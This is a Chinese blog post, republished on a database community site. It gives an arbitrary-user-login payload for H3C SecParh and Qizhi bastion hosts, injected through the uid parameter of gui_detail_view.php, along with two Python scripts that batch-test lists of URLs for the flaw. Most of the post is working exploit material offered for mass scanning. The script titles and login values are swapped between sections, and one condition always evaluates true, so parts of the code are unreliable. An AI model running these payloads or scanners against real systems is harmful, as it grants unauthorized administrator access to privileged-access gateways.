H3C SecParh堡垒机&齐治堡垒机的任意用户登录批量验证脚本

Redus 2021-05-19

3645

前两天看到某Qi公众号一篇关于H3C SecParh堡垒机的文章，尝试复现了一下，文中还提到此漏洞与齐治堡垒机漏洞相似，于是又出看了看齐治的漏洞，感觉验证挺简单的，随手写了个验证脚本，虽然很烂也是学习中的一个小成绩。（大佬勿喷，球球了！）

H3C SecParh堡垒机的payload：

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

批量验证的脚本：

#!/usr/bin/python3
#!Redus
from time import process_time
import requests
import re
import csv
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('-----------------------------------------------')
    print('          齐治堡垒机 任意用户登录漏洞            ')
    print('-----------------------------------------------')




def POC_1(url):
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',
        'Cookie':'PHPSESSID=crbca0umfhd8gh9i01vpsi02k4'
    }
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    html = requests.get(url,headers=headers,verify=False)
    mate = re.compile('<ul.*?main.*?span.*?>(.*?)<img.*?/>',re.S)
    items = re.findall(mate,html.text)
    try:
        if items == ['事件审计 ', '']:
            print('↓↓↓↓↓↓↓↓↓↓存在任意用户登录漏洞↓↓↓↓↓↓↓↓↓')
            print(url1)
        elif items[0] == "双人复核" or "命令复核":
            print('↓↓↓↓↓↓↓↓↓↓↓↓↓↓不存在漏洞↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓')
            print(url1)
    except:
        print("此IP路径存在异常：" + url)


if __name__ == '__main__':
    payload = '/audit/gui_detail_view.php?token=1&id=\&uid=%2Cchr(97)) or 1: print chr(121)%2bchr(101)%2bchr(115)%0D%0A%23&login=shterm'
    title()
    for url in open(r'url2.txt'):
        url = url.strip('/')
        url1 = url.strip() + payload
        POC_1(url1)

齐治堡垒机的payload：

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

验证的脚本:

#!/usr/bin/python3
#!Redus
from time import process_time
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('-----------------------------------------------')
    print('       H3C SecParh堡垒机 任意用户登录漏洞        ')
    print('-----------------------------------------------')


def POC_1(url):
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',
        'Cookie':'PHPSESSID=fle8b8sftmpdetrh2jk2jbe7b2'
    }
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    verify = url + payload
    html = requests.get(verify,headers=headers,verify=False)
    mate = re.compile('<ul.*?main.*?span.*?>(.*?)<img.*?/>',re.S)
    items = re.findall(mate,html.text)
    try:
        if items == ['事件审计 ', '']:
            print('↓↓↓↓↓↓↓↓↓↓存在任意用户登录漏洞↓↓↓↓↓↓↓↓↓')
        elif items[0] == "双人复核" or "命令复核":
            print('↓↓↓↓↓↓↓↓↓↓↓↓↓↓不存在漏洞↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓')
        return items[0]
    except:
        print("此url存在问题：" + url)


if __name__ == '__main__':
    payload = '/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin'
    title()
    for url in open(r'url.txt'):
        url = url.strip('/')
        url1 = url.strip( ) + payload
        POC_1(url1)
        print(url1)

在写脚本中发现这两个验证方法一样，框架也一样（离谱！），验证时的 cookie 和 payload 不一样就没啥区别了。

emmm水不出字数了，就提前祝大家520快乐吧。希望各位看官单身的早日脱单。

我喜欢你

剩下两行

都是废话

文末推荐一位表哥公众号！

数据库

文章转载自Redus，如果涉嫌侵权，请发送邮件至：contact@modb.pro进行举报，并提供相关证据，一经查实，墨天轮将立刻删除相关内容。

H3C SecParh堡垒机&齐治堡垒机的任意用户登录批量验证脚本

评论